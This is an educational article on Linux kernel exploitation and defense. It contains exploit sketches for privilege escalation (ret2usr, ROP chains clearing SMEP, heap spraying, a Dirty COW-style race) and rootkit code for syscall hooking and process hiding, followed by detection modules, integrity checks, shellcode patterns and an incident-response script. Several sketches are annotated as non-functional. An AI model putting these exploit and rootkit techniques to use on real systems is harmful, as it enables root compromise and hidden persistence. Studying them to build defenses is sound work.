Linux Kernel Exploitation and Defense: Understanding Attack Techniques and Building Robust Defenses
Understanding how kernel exploits work is crucial for building effective defenses. This comprehensive guide explores common kernel exploitation techniques, analyzes real-world vulnerabilities, and provides practical defensive strategies to protect against sophisticated attacks.
The Kernel Attack Landscape
Why Target the Kernel?
The kernel represents the ultimate target for attackers:
- Complete System Control: Kernel compromise means game over
- Bypass All Security: Disable SELinux, AppArmor, and other protections
- Persistent Access: Install undetectable rootkits
- Data Exfiltration: Access all memory and files
- Hardware Control: Direct access to devices and firmware
Common Vulnerability Classes
/* Example 1: classic kernel stack buffer overflow in an ioctl handler.
 * buffer is 64 bytes but input.size is attacker-controlled and never
 * validated, so the second copy_from_user() can smash the kernel stack. */
/* 1. Buffer Overflow - Classic stack/heap overflow */static int vulnerable_ioctl(unsigned long arg) { char buffer[64]; struct user_input input;
// Vulnerable: No size validation if (copy_from_user(&input, (void __user *)arg, sizeof(input))) return -EFAULT;
// Stack overflow if input.size > 64 if (copy_from_user(buffer, input.data, input.size)) return -EFAULT;
return 0;}
/* Example 2: use-after-free. The object is freed and its function pointer
 * is then invoked; an attacker who reallocates the freed slab slot with
 * controlled data decides the call target. */
/* 2. Use-After-Free (UAF) */struct vulnerable_struct { void (*callback)(void); int data;};
static void trigger_uaf(void) { struct vulnerable_struct *vuln = kmalloc(sizeof(*vuln), GFP_KERNEL);
vuln->callback = legitimate_function; kfree(vuln);
// UAF: Using freed memory vuln->callback(); // Attacker can control this}
/* Example 3: TOCTOU race on a global refcount. The busy-check and the
 * increment are not atomic, so two concurrent openers can both pass the
 * gate. Fix pattern: a lock or atomic compare-and-swap around check+set. */
/* 3. Race Condition */static int refcount = 0;static struct resource *shared_resource;
static int vulnerable_open(struct inode *inode, struct file *file) { // Race window between check and use if (refcount > 0) return -EBUSY;
// Another thread can increment refcount here
refcount++; shared_resource = allocate_resource(); return 0;}
/* Example 4: integer overflow. count * size can wrap, yielding a short
 * allocation that later code overruns. Fix pattern: kcalloc() or
 * check_mul_overflow() before allocating. */
/* 4. Integer Overflow */static int vulnerable_alloc(unsigned int count, unsigned int size) { void *buffer;
// Integer overflow: count * size can overflow buffer = kmalloc(count * size, GFP_KERNEL); if (!buffer) return -ENOMEM;
// Later code assumes buffer is count*size bytes return 0;}
/* Example 5: kernel infoleak. Only one field of the on-stack struct is
 * initialized; copy_to_user() ships the remaining stale stack bytes
 * (possibly kernel pointers, useful against KASLR) to userspace.
 * Fix pattern: memset(&data, 0, sizeof(data)) before filling it. */
/* 5. Information Leak */static long vulnerable_read(char __user *buf, size_t count) { struct kernel_data data;
// Uninitialized stack variable // May contain sensitive kernel data
data.public_field = 0x41414141; // data.private_field is uninitialized!
if (copy_to_user(buf, &data, sizeof(data))) return -EFAULT;
return sizeof(data);}
Exploitation Techniques
1. ret2usr - Return to Userspace
// Exploit technique: Redirect kernel execution to user-controlled code
/* ret2usr target: the kernel copies an ops struct from userspace and then
 * calls its function pointer. Without SMEP the pointer may point straight
 * at attacker-mapped user pages, executed with kernel privilege. */
/* Vulnerable kernel code */struct ops { void (*func)(void);};
static void vulnerable_function(struct ops *user_ops) { struct ops *ops;
ops = kmalloc(sizeof(*ops), GFP_KERNEL);
// Vulnerable: Trusting user pointer if (copy_from_user(ops, user_ops, sizeof(*ops))) { kfree(ops); return; }
// Call user-controlled function pointer ops->func(); // Can point to userspace!}
/* Illustrative ret2usr exploit sketch (non-functional as written).
 * NOTE(review): the correct header is <sys/mman.h>, not <sys/mmap.h>;
 * the inline asm operand order is inverted (it reads cr4 back after the
 * mask instead of writing it); and fd/VULNERABLE_IOCTL are undefined.
 * Treat this as expository pseudocode, not a working PoC. */
/* Exploit code */#include <stdio.h>#include <sys/mmap.h>
// Exploit payload in userspacevoid exploit_payload(void) { // We're in kernel context but executing user code! __asm__( // Disable SMEP/SMAP if needed "mov cr4, rax\n" "and rax, ~(1 << 20)\n" // Clear SMEP bit "mov rax, cr4\n"
// Elevate privileges "mov rax, 0\n" // prepare_kernel_cred(0) "call prepare_kernel_cred\n" "mov rdi, rax\n" "call commit_creds\n" // commit_creds(prepare_kernel_cred(0))
// Return to userspace "swapgs\n" "iretq\n" );}
int main() { struct ops evil_ops = { .func = exploit_payload };
// Trigger vulnerable ioctl ioctl(fd, VULNERABLE_IOCTL, &evil_ops);
// We should have root now system("/bin/sh");}
2. ROP/JOP - Code Reuse Attacks
/* ROP sketch: a chain of existing kernel gadgets that clears SMEP in CR4
 * and then performs commit_creds(prepare_kernel_cred(0)). Every address
 * in the chain must already be known, i.e. KASLR must be defeated first. */
/* ROP Chain Construction */
// Find gadgets in kernel// gadget 1: pop rdi; ret// gadget 2: mov cr4, rdi; ret// gadget 3: prepare_kernel_cred// gadget 4: commit_creds
unsigned long rop_chain[] = { POP_RDI_RET, // gadget 1 CR4_VALUE_NO_SMEP, // value for cr4 MOV_CR4_RDI_RET, // gadget 2 POP_RDI_RET, // gadget 1 0, // NULL for prepare_kernel_cred PREPARE_KERNEL_CRED,// gadget 3 POP_RDI_RET, // gadget 1 // Return value from previous call goes to rdi COMMIT_CREDS, // gadget 4 USERSPACE_RETURN // Clean return to userspace};
/* Trigger overflow with ROP chain */void trigger_exploit(void) { char buffer[512];
// Fill buffer to overflow point memset(buffer, 'A', 64);
// Overwrite return address with ROP chain memcpy(buffer + 64, rop_chain, sizeof(rop_chain));
// Trigger vulnerable syscall syscall(VULNERABLE_SYSCALL, buffer, sizeof(buffer));}
3. Kernel Heap Exploitation
/* Heap grooming sketch: (1) spray the slab with controllable objects,
 * (2) free every other one to punch holes, (3) trigger the vulnerable
 * allocation so it lands in a hole adjacent to controlled data.
 * NOTE(review): spray_fds is local to heap_spray() but read in
 * create_holes() - expository pseudocode, not compilable as-is. */
/* Heap Spray Technique */
// Step 1: Spray kernel heap with controlled objectsvoid heap_spray(void) { int spray_fds[SPRAY_COUNT];
for (int i = 0; i < SPRAY_COUNT; i++) { // Each open() allocates kernel structures spray_fds[i] = open("/dev/null", O_RDONLY);
// Control content via ioctl ioctl(spray_fds[i], SET_CALLBACK, controlled_data); }}
// Step 2: Create holes in heapvoid create_holes(void) { // Close every other fd to create holes for (int i = 0; i < SPRAY_COUNT; i += 2) { close(spray_fds[i]); }}
// Step 3: Trigger UAF to allocate in holevoid trigger_uaf(void) { // Vulnerable driver allocates in our controlled hole ioctl(vuln_fd, TRIGGER_UAF, size_matching_hole);}
/* SLUB freelist-poisoning sketch: overflow out of one object into the
 * free-list pointer of an adjacent freed slot so that a later allocation
 * from the same cache returns an attacker-chosen address, yielding an
 * arbitrary write primitive. */
/* SLUB Cache Exploitation */struct target_object { void (*fn_ptr)(void); char buffer[56];};
void exploit_slub(void) { // 1. Allocate many objects in same cache int fds[256]; for (int i = 0; i < 256; i++) { fds[i] = open("/dev/vuln", O_RDONLY); }
// 2. Free some to create free list for (int i = 0; i < 256; i += 2) { close(fds[i]); }
// 3. Overflow into free list pointer char overflow[128]; memset(overflow, 'A', 64); *(unsigned long *)(overflow + 64) = CONTROLLED_ADDRESS;
ioctl(fds[1], OVERFLOW_IOCTL, overflow);
// 4. Next allocation returns our controlled address int evil_fd = open("/dev/vuln", O_RDONLY);
// 5. Write to arbitrary address write(evil_fd, shellcode, sizeof(shellcode));}
4. Race Condition Exploitation
/* Double-fetch (TOCTOU across copy_from_user): req.size is validated
 * after the first fetch but the struct is fetched again before use, so a
 * racing thread can enlarge size between check and copy.
 * Fix pattern: fetch once, validate the local copy, use only that copy. */
/* Double-Fetch Vulnerability */
// Vulnerable kernel codestatic long vulnerable_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { struct user_request req; void *buffer;
// First fetch - TIME-OF-CHECK if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
if (req.size > MAX_SIZE) return -EINVAL;
buffer = kmalloc(req.size, GFP_KERNEL);
// Second fetch - TIME-OF-USE if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
// req.size could have changed! if (copy_from_user(buffer, req.data, req.size)) // Overflow! return -EFAULT;
return 0;}
/* Userspace driver for the double-fetch above: a helper thread flips
 * size between a valid and an oversized value in a shared mapping while
 * the main thread hammers the ioctl until the race window is hit. */
/* Exploit using racing threads */#include <pthread.h>
struct user_request *shared_req;volatile int stop_race = 0;
void *race_thread(void *arg) { while (!stop_race) { shared_req->size = 64; // Valid size usleep(1); shared_req->size = 1024; // Overflow size usleep(1); } return NULL;}
void exploit_double_fetch(void) { pthread_t thread;
shared_req = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
shared_req->size = 64; shared_req->data = exploit_buffer;
pthread_create(&thread, NULL, race_thread, NULL);
// Trigger race - will eventually hit the window for (int i = 0; i < 10000; i++) { ioctl(fd, VULNERABLE_IOCTL, shared_req); }
stop_race = 1; pthread_join(thread, NULL);}
Advanced Exploitation: Bypassing Mitigations
1. Bypassing KASLR
/* KASLR leak method 1: prefetch timing side channel. Prefetching a
 * mapped (kernel) address completes measurably faster than an unmapped
 * one, so the KASLR slide range is scanned and the first "fast" address
 * is taken as the image base.
 * NOTE(review): rdtsc()/THRESHOLD are placeholders; a real measurement
 * needs serialization (lfence/cpuid) and repeated sampling. */
/* Information Leak to Defeat KASLR */
// Method 1: Side-channel via prefetchunsigned long leak_kernel_base(void) { unsigned long min_addr = 0xffffffff80000000; unsigned long max_addr = 0xffffffffc0000000; unsigned long kernel_base = 0;
for (unsigned long addr = min_addr; addr < max_addr; addr += 0x100000) { unsigned long time1 = rdtsc();
// Prefetch instruction __asm__ volatile("prefetcht0 (%0)" : : "r"(addr));
unsigned long time2 = rdtsc();
// Kernel addresses take less time (in cache) if (time2 - time1 < THRESHOLD) { kernel_base = addr & ~0xfffff; // Align to 2MB break; } }
return kernel_base;}
/* KASLR leak method 2: read a kernel text pointer through an infoleak
 * bug and mask it down to the randomized image base. */
// Method 2: Kernel pointer leakstruct leaked_data { unsigned long kernel_ptr; char padding[56];};
unsigned long find_kernel_base(int fd) { struct leaked_data data;
// Trigger info leak vulnerability ioctl(fd, LEAK_IOCTL, &data);
// Calculate base from leaked pointer // Kernel text is usually at offset 0 return data.kernel_ptr & 0xffffffffff000000;}
2. Bypassing SMEP/SMAP
/* CR4-based mitigation bypass: clears the SMEP/SMAP enable bits. This
 * only works once the attacker already executes at ring 0; modern
 * kernels additionally pin these CR4 bits and restore them if cleared. */
/* Native Code to Disable SMEP/SMAP */
// CR4 register bits#define CR4_SMEP (1 << 20)#define CR4_SMAP (1 << 21)
void disable_smep_smap(void) { unsigned long cr4;
// Read current CR4 __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
// Clear SMEP and SMAP bits cr4 &= ~(CR4_SMEP | CR4_SMAP);
// Write back - requires kernel privilege __asm__ volatile("mov %0, %%cr4" : : "r"(cr4));}
/* The same CR4 write expressed as a ROP fragment, for exploits that
 * cannot inject native code. */
/* ROP Gadget Method */// Find gadgets:// pop rdi; ret// mov cr4, rdi; ret
unsigned long rop_disable_protections[] = { GADGET_POP_RDI, CR4_VALUE_NO_SMEP_SMAP, GADGET_MOV_CR4_RDI, // Continue exploitation...};
3. Bypassing KPTI
/* KPTI splits user and kernel page tables, but the entry trampoline and
 * cpu_entry_area must remain mapped in both; these sketches target such
 * always-mapped regions.
 * NOTE(review): mmap's first two parameters are (addr, length) - the
 * sketch passes FIXED_ADDR as addr; expository pseudocode. */
/* KPTI Bypass via Kernel Memory Layout Knowledge */
// KPTI separates user/kernel page tables// But some pages must be mapped in both
struct kpti_bypass { // Target KPTI trampoline pages unsigned long trampoline_addr;
// Or target cpu_entry_area (always mapped) unsigned long cpu_entry_addr;};
// Use these always-mapped regions for exploitationvoid exploit_with_kpti(void) { // Place shellcode in user-kernel shared region void *shared = mmap(FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_SHARED, -1, 0);
memcpy(shared, kernel_shellcode, sizeof(kernel_shellcode));
// Redirect execution to shared region trigger_vulnerability(FIXED_ADDR);}
Real-World Vulnerability Analysis
CVE-2016-5195 (Dirty COW)
/* CVE-2016-5195 (Dirty COW), heavily simplified: the race window sits
 * between the PTE writability check and the copy-on-write handling in
 * the get_user_pages() path. This is an illustration, not the literal
 * upstream code. */
/* Dirty COW - Race condition in get_user_pages */
// Vulnerable code path (simplified)int get_user_pages(unsigned long start, int nr_pages, int write, struct page **pages) { // ... if (write && !pte_write(pte)) { // Copy-on-write handling // RACE WINDOW: Between check and action do_wp_page(mm, vma, address, pte); } // ...}
/* Shape of the widely published Dirty COW PoC: one thread repeatedly
 * discards the private mapping with madvise(MADV_DONTNEED) while another
 * writes through /proc/self/mem, racing the COW logic into writing the
 * read-only backing file. Fixed upstream in 2016. */
/* Exploit Implementation */#include <sys/mman.h>#include <fcntl.h>#include <pthread.h>#include <string.h>
void *map;int f;struct stat st;char *name;
void *madvise_thread(void *arg) { while (1) { madvise(map, st.st_size, MADV_DONTNEED); } return NULL;}
void *write_thread(void *arg) { int f = open("/proc/self/mem", O_RDWR); while (1) { // Write to private mapping -> triggers COW lseek(f, (unsigned long)map, SEEK_SET); write(f, "hacked", 6); } return NULL;}
void exploit_dirtycow(char *filename) { pthread_t pth1, pth2;
f = open(filename, O_RDONLY); fstat(f, &st);
// Create private mapping of file map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
// Race MADV_DONTNEED with write pthread_create(&pth1, NULL, madvise_thread, NULL); pthread_create(&pth2, NULL, write_thread, NULL);
// Wait for exploitation pthread_join(pth1, NULL); pthread_join(pth2, NULL);}
CVE-2017-1000112 (UFO Vulnerability)
/* CVE-2017-1000112: memory corruption on the UFO (UDP Fragment Offload)
 * path, triggered via oversized MSG_MORE sends. The kernel excerpt here
 * is a simplified illustration of the flawed size handling, not the
 * literal upstream code. */
/* UFO (UDP Fragment Offload) Exploit */
// Vulnerable code - integer overflow in UFOstatic int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len) { // ... if (up->pending) { // Fragment handling // Integer overflow in size calculation mtu = dst_mtu(&rt->dst);
// Overflow here! if (len > mtu - sizeof(struct udphdr)) fragment_size = len / (mtu - sizeof(struct udphdr)); } // ...}
/* Exploit trigger */void trigger_ufo_overflow(void) { int sock = socket(AF_INET, SOCK_DGRAM, 0); struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(1337), .sin_addr.s_addr = inet_addr("127.0.0.1") };
// Set up UFO int val = 1; setsockopt(sock, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
// Trigger overflow with crafted size char buffer[65507]; // Max UDP size memset(buffer, 'A', sizeof(buffer));
// This triggers integer overflow in kernel sendto(sock, buffer, sizeof(buffer), MSG_MORE, (struct sockaddr *)&addr, sizeof(addr));}
Kernel Rootkit Techniques
1. System Call Table Hooking
/* Classic rootkit technique: brute-force scan kernel memory for
 * sys_call_table, clear CR0.WP, and swap the __NR_open entry for a
 * wrapper that hides paths containing "rootkit".
 * NOTE(review): historical illustration - on modern kernels the table
 * and sys_close are not exported, syscalls take struct pt_regs, and
 * strncpy_from_user() may leave fname unterminated when the path is
 * exactly sizeof(fname) long. */
/* Classic Syscall Hooking */
// Find syscall tableunsigned long *find_syscall_table(void) { unsigned long *syscall_table; unsigned long int i;
// Search for sys_close reference for (i = PAGE_OFFSET; i < ULLONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i;
if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; }
return NULL;}
// Hook implementationasmlinkage long (*original_open)(const char __user *, int, umode_t);
asmlinkage long hooked_open(const char __user *filename, int flags, umode_t mode) { char fname[256];
// Copy filename from userspace strncpy_from_user(fname, filename, sizeof(fname));
// Hide rootkit files if (strstr(fname, "rootkit")) { return -ENOENT; }
return original_open(filename, flags, mode);}
void install_hook(void) { unsigned long *syscall_table = find_syscall_table();
// Disable write protection write_cr0(read_cr0() & ~X86_CR0_WP);
// Save original and install hook original_open = (void *)syscall_table[__NR_open]; syscall_table[__NR_open] = (unsigned long)hooked_open;
// Re-enable write protection write_cr0(read_cr0() | X86_CR0_WP);}
2. VFS Hooking
/* VFS-level rootkit: obtain the root directory's file_operations via
 * filp_open() and replace iterate_shared so directory listings can be
 * filtered before they reach userspace. */
/* File Operations Hooking */
struct file_operations *get_fop(const char *path) { struct file *file;
file = filp_open(path, O_RDONLY, 0); if (IS_ERR(file)) return NULL;
// NOTE(review): the opened file is never closed (filp_close missing),
// and casting away the const on f_op is intentional here - it is what
// makes the technique (and its detection) possible.
return (struct file_operations *)file->f_op;}
// Hook directory operationsint (*original_iterate)(struct file *, struct dir_context *);
int hooked_iterate(struct file *file, struct dir_context *ctx) { int ret = original_iterate(file, ctx);
// Filter out hidden entries // Complex implementation needed to properly filter
return ret;}
void hook_vfs(void) { struct file_operations *fops;
fops = get_fop("/"); original_iterate = fops->iterate_shared;
// Disable write protection and hook disable_wp(); fops->iterate_shared = hooked_iterate; enable_wp();}
3. Kernel Object Manipulation
/* DKOM: hide a process by unlinking its task_struct from the global
 * task list and PID hash (the scheduler still runs it via its own
 * queues), and hide TCP sockets by deleting them from the ehash table.
 * Cross-view detection (below in this article) exploits exactly this
 * inconsistency between data structures. */
/* Direct Kernel Object Manipulation (DKOM) */
// Hide process by unlinking from task listvoid hide_process(pid_t pid) { struct task_struct *task;
// Find task task = pid_task(find_vpid(pid), PIDTYPE_PID); if (!task) return;
// Remove from task list list_del(&task->tasks);
// Remove from PID hash detach_pid(task, PIDTYPE_PID);}
// Hide network connectionsvoid hide_tcp_port(unsigned short port) { struct sock *sk; struct hlist_nulls_node *node;
// Iterate TCP hash table sk_nulls_for_each(sk, node, &tcp_hashinfo.ehash[port].chain) { if (sk->sk_num == port) { // Remove from hash table sk_nulls_del_node_init_rcu(sk); } }}
Detection and Defense Strategies
1. Runtime Kernel Protection
/* Defensive monitor: a kprobe on commit_creds flags uid transitions to 0
 * from non-root processes, and a module notifier rejects unsigned or
 * pattern-matched modules before they initialize.
 * NOTE(review): regs->di is x86-64-specific, and returning 1 from a
 * kprobe pre-handler does not skip the probed function on mainline
 * kernels - treat the enforcement parts as illustrative. */
/* Kernel Runtime Security Monitor */
#include <linux/kprobes.h>#include <linux/ptrace.h>
// Monitor critical functionsstatic struct kprobe kp_commit_creds = { .symbol_name = "commit_creds",};
static int handler_commit_creds(struct kprobe *p, struct pt_regs *regs) { struct cred *new = (struct cred *)regs->di;
// Check for privilege escalation if (new->uid.val == 0 && current_uid().val != 0) { pr_alert("Privilege escalation detected! PID: %d\n", current->pid);
// Kill the process force_sig(SIGKILL);
return 1; // Skip original function }
return 0;}
// Monitor module loadingstatic int module_notifier(struct notifier_block *nb, unsigned long action, void *data) { struct module *mod = data;
if (action == MODULE_STATE_COMING) { // Verify module signature if (!mod->sig_ok) { pr_alert("Unsigned module blocked: %s\n", mod->name); return NOTIFY_BAD; }
// Check for rootkit patterns if (is_rootkit_pattern(mod)) { pr_alert("Suspected rootkit blocked: %s\n", mod->name); return NOTIFY_BAD; } }
return NOTIFY_OK;}
static struct notifier_block module_nb = { .notifier_call = module_notifier,};
int init_protection(void) { // Register kprobes kp_commit_creds.pre_handler = handler_commit_creds; register_kprobe(&kp_commit_creds);
// Register module notifier register_module_notifier(&module_nb);
return 0;}
2. Exploit Detection
/* Exploit heuristics: (1) stack-pivot check - is RSP outside the current
 * thread's kernel stack at event time; (2) crude ROP detector - many
 * consecutive stack slots whose targets decode as 'ret'.
 * NOTE(review): current->stack is a void *, so the bounds arithmetic
 * needs casts; both heuristics are illustrative and prone to false
 * positives/negatives on real workloads. */
/* Stack Pivot Detection */
void check_stack_pivot(struct pt_regs *regs) { unsigned long stack_start = current->stack; unsigned long stack_end = stack_start + THREAD_SIZE;
// Check if RSP points outside stack if (regs->sp < stack_start || regs->sp > stack_end) { pr_alert("Stack pivot detected! PID: %d RSP: %lx\n", current->pid, regs->sp);
// Dump registers for analysis show_regs(regs);
// Terminate process force_sig(SIGSEGV); }}
/* ROP/JOP Detection */
#define MAX_RET_DEPTH 10
int detect_rop_chain(unsigned long *stack_ptr) { int ret_count = 0; unsigned long addr;
for (int i = 0; i < 100; i++) { if (get_user(addr, &stack_ptr[i])) break;
// Check if address is a 'ret' instruction if (is_ret_instruction(addr)) { ret_count++;
if (ret_count > MAX_RET_DEPTH) { pr_alert("ROP chain detected!\n"); return 1; } } else { ret_count = 0; } }
return 0;}
3. Kernel Integrity Monitoring
/* Integrity monitoring: keep SHA-256 baselines of critical kernel
 * structures (syscall table, IDT, security ops), re-hash them from a
 * periodic timer, and escalate on any mismatch - catches the hooking
 * techniques shown earlier in this article. */
/* Critical Structure Monitoring */
struct integrity_check { void *address; size_t size; u8 hash[32]; // SHA-256};
static struct integrity_check critical_structures[] = { { &sys_call_table, sizeof(sys_call_table), {0} }, { &idt_table, sizeof(idt_table), {0} }, { &security_ops, sizeof(security_ops), {0} },};
void check_kernel_integrity(void) { u8 current_hash[32];
for (int i = 0; i < ARRAY_SIZE(critical_structures); i++) { // Calculate current hash calculate_sha256(critical_structures[i].address, critical_structures[i].size, current_hash);
// Compare with stored hash if (memcmp(current_hash, critical_structures[i].hash, 32)) { pr_alert("Kernel structure modified: %p\n", critical_structures[i].address);
// Trigger incident response kernel_integrity_violated(); } }}
/* Periodic Integrity Timer */static struct timer_list integrity_timer;
void integrity_timer_callback(struct timer_list *t) { check_kernel_integrity();
// Re-arm timer mod_timer(&integrity_timer, jiffies + HZ * 60); // Every minute}
4. Advanced Rootkit Detection
/* Rootkit sweeps: cross-view comparison (kernel task list vs what /proc
 * exposes), scheduler-queue checks, raw memory scans, and restoring the
 * syscall table from a known-good copy.
 * NOTE(review): "EPROCESS" is Windows terminology; the Linux analog is
 * task_struct. proc_pid_lookup/detect_* are stand-in helpers. */
/* Hidden Process Detection */
void detect_hidden_processes(void) { struct task_struct *task; pid_t *pid_list; int count = 0;
// Method 1: Compare /proc with task list rcu_read_lock(); for_each_process(task) { if (!proc_pid_lookup(task->pid)) { pr_alert("Hidden process found: PID %d\n", task->pid); } } rcu_read_unlock();
// Method 2: Check scheduling queues detect_scheduler_manipulation();
// Method 3: Memory scanning for EPROCESS structures scan_memory_for_processes();}
/* Syscall Table Restoration */
void restore_syscall_table(void) { unsigned long *table = find_syscall_table();
// Restore from known good copy disable_wp(); memcpy(table, original_syscall_table, __NR_syscalls * sizeof(unsigned long)); enable_wp();
pr_info("Syscall table restored\n");}
Building Secure Kernel Modules
Secure Coding Practices
/* Hardened open/release pair: validate arguments, consult the LSM hook
 * before granting access, use an accounted zeroed allocation for
 * user-triggered state, and scrub private data with memzero_explicit()
 * before freeing so secrets do not linger in freed slab memory. */
/* Secure Module Template */
#include <linux/module.h>#include <linux/kernel.h>#include <linux/security.h>
// Use proper error handlingstatic int secure_open(struct inode *inode, struct file *file) { int ret;
// Validate inputs if (!inode || !file) return -EINVAL;
// Check permissions ret = security_file_permission(file, MAY_READ); if (ret) return ret;
// Use GFP_KERNEL_ACCOUNT for user-triggered allocations file->private_data = kzalloc(sizeof(struct private_data), GFP_KERNEL_ACCOUNT); if (!file->private_data) return -ENOMEM;
return 0;}
// Proper cleanupstatic int secure_release(struct inode *inode, struct file *file) { // Clear sensitive data if (file->private_data) { memzero_explicit(file->private_data, sizeof(struct private_data)); kfree(file->private_data); }
return 0;}
// Input validationstatic long secure_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { struct user_request req;
// Bounds check command if (_IOC_TYPE(cmd) != SECURE_IOC_MAGIC) return -ENOTTY;
if (_IOC_NR(cmd) > SECURE_IOC_MAXNR) return -ENOTTY;
// Safe copy from user if (copy_from_user(&req, (void __user *)arg, sizeof(req))) return -EFAULT;
// Validate all fields if (req.size > MAX_REQUEST_SIZE) return -EINVAL;
// Use exact allocation size void *buffer = kmalloc(req.size, GFP_KERNEL); if (!buffer) return -ENOMEM;
// Process request...
kfree(buffer); return 0;}
Module Hardening
/* Hardened module lifecycle: version/LSM preconditions checked at init,
 * restrictive device permissions, and an exit handler that refuses
 * unauthorized unload attempts.
 * NOTE(review): LINUX_VERSION_CODE is a compile-time constant (this is a
 * build-time check, not runtime), and this_device->devt is a dev_t, not
 * a struct with a mode field - device permissions belong in the miscdevice
 * .mode field or udev rules. */
/* Hardened Module Initialization */
static int __init secure_module_init(void) { int ret;
// Verify kernel version compatibility if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 10, 0)) { pr_err("Kernel version too old\n"); return -EINVAL; }
// Check security frameworks if (!security_module_enable("capability")) { pr_err("Required security module not available\n"); return -EINVAL; }
// Register with strict permissions ret = misc_register(&secure_device); if (ret) { pr_err("Failed to register device\n"); return ret; }
// Set restrictive permissions secure_device.this_device->devt->mode = 0600;
// Initialize security features init_random_key(); setup_integrity_checking();
pr_info("Secure module loaded\n"); return 0;}
// Protect against forced unloadstatic void __exit secure_module_exit(void) { // Verify authorized unload if (!authorized_unload()) { pr_err("Unauthorized module unload attempt\n"); return; // Refuse to unload }
// Clean up securely destroy_crypto_keys(); misc_deregister(&secure_device);}
module_init(secure_module_init);module_exit(secure_module_exit);
MODULE_LICENSE("GPL");MODULE_AUTHOR("Security Team");MODULE_DESCRIPTION("Hardened kernel module");MODULE_VERSION("1.0");
// Enforce signature requirementMODULE_INFO(sig_enforce, "Y");
Incident Response
Kernel Compromise Response
#!/bin/bash
# Kernel incident response: isolate the host, collect volatile evidence,
# run rootkit scanners, and snapshot kernel state for offline analysis.
echo "Kernel Incident Response Script"
echo "=============================="

# 1. Isolate the system
echo "Isolating system..."
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# 2. Collect evidence
echo "Collecting evidence..."
mkdir -p /evidence/{memory,disk,logs}

# Dump kernel memory (LiME acquisition module)
insmod /tools/lime.ko "path=/evidence/memory/kernel.lime format=lime"

# Save system state
ps auxww > /evidence/system_processes.txt
netstat -an > /evidence/network_connections.txt
lsmod > /evidence/loaded_modules.txt
mount > /evidence/mounted_filesystems.txt

# Copy critical logs
cp -r /var/log/* /evidence/logs/
dmesg > /evidence/logs/dmesg.txt

# 3. Check for rootkits
echo "Checking for rootkits..."
rkhunter --check --skip-keypress
chkrootkit

# 4. Analyze kernel integrity
echo "Checking kernel integrity..."
cat /proc/kallsyms > /evidence/kallsyms.txt
cat /proc/modules > /evidence/modules.txt

# Compare with known good values
diff /evidence/kallsyms.txt /secure/baseline/kallsyms.txt

# 5. Look for persistence mechanisms
echo "Checking persistence..."
find / -type f -perm -4000 -ls > /evidence/suid_files.txt
crontab -l > /evidence/crontab.txt
systemctl list-unit-files > /evidence/systemd_units.txt

echo "Initial response complete. System isolated."
Live Forensics
/* Live forensics module: resolve critical symbols via kallsyms, verify
 * syscall table entries still point at their canonical handlers, and
 * scan mapped pages for common shellcode byte sequences.
 * NOTE(review): kallsyms_lookup_name() is no longer exported to modules
 * since kernel 5.7, and for_each_zone_page/memmem here are stand-ins
 * for real page iteration and byte search - illustrative code. */
/* Live Kernel Memory Analysis */
#include <linux/module.h>#include <linux/kallsyms.h>#include <linux/slab.h>
void analyze_kernel_memory(void) { unsigned long *syscall_table; void *commit_creds_addr;
// Find critical functions syscall_table = (unsigned long *)kallsyms_lookup_name("sys_call_table"); commit_creds_addr = (void *)kallsyms_lookup_name("commit_creds");
pr_info("Syscall table at: %p\n", syscall_table); pr_info("commit_creds at: %p\n", commit_creds_addr);
// Check for hooks if (syscall_table[__NR_open] != kallsyms_lookup_name("sys_open")) { pr_alert("sys_open is hooked!\n"); pr_alert("Hooked address: %lx\n", syscall_table[__NR_open]); }
// Scan for inline hooks check_inline_hooks(commit_creds_addr);}
/* Memory Pattern Scanner */void scan_for_shellcode(void) { struct page *page; void *addr;
// Common shellcode patterns unsigned char patterns[][8] = { {0x48, 0x31, 0xc0, 0x48, 0x89, 0xc7, 0xe8}, // xor rax,rax; mov rdi,rax; call {0x0f, 0x01, 0xf8, 0x65, 0x48, 0x89, 0x24}, // swapgs; mov [rsp],reg {0x0f, 0x05, 0x48, 0x89, 0xc7, 0xe8}, // syscall; mov rdi,rax; call };
for_each_zone_page(page) { if (!page || PageReserved(page)) continue;
addr = kmap_atomic(page);
for (int i = 0; i < ARRAY_SIZE(patterns); i++) { if (memmem(addr, PAGE_SIZE, patterns[i], sizeof(patterns[i]))) { pr_alert("Shellcode pattern found at %p\n", page_address(page)); } }
kunmap_atomic(addr); }}
Prevention Best Practices
1. Secure Development
/* Secure-coding checklist fragments (not a single compilable function):
 * user-pointer validation, bounds and overflow checks before indexing or
 * allocating, strscpy over strcpy/strncpy, locking discipline around
 * shared state, allocation-failure handling, and goto-style cleanup so
 * every error path releases what it acquired. */
/* Security Checklist for Kernel Modules */
// ✓ Input validationif (!access_ok(user_buffer, size)) return -EFAULT;
// ✓ Bounds checkingif (index >= ARRAY_SIZE(array)) return -EINVAL;
// ✓ Integer overflow protectionif (count > SIZE_MAX / size) return -EOVERFLOW;
// ✓ Use safe string functionsstrscpy(dest, src, sizeof(dest));
// ✓ Proper lockingmutex_lock(&resource_mutex);// ... critical section ...mutex_unlock(&resource_mutex);
// ✓ Error handlingptr = kmalloc(size, GFP_KERNEL);if (!ptr) return -ENOMEM;
// ✓ Cleanup on error pathserror_path: kfree(allocated_memory); mutex_unlock(&lock); return ret;
2. Runtime Protections
# Kernel hardening checklist: persist exploit-mitigation sysctls.
cat > /etc/sysctl.d/99-security.conf << EOF
# Kernel exploit mitigation
kernel.kptr_restrict = 2
kernel.dmesg_restrict = 1
kernel.perf_event_paranoid = 3
kernel.yama.ptrace_scope = 2
kernel.unprivileged_bpf_disabled = 1

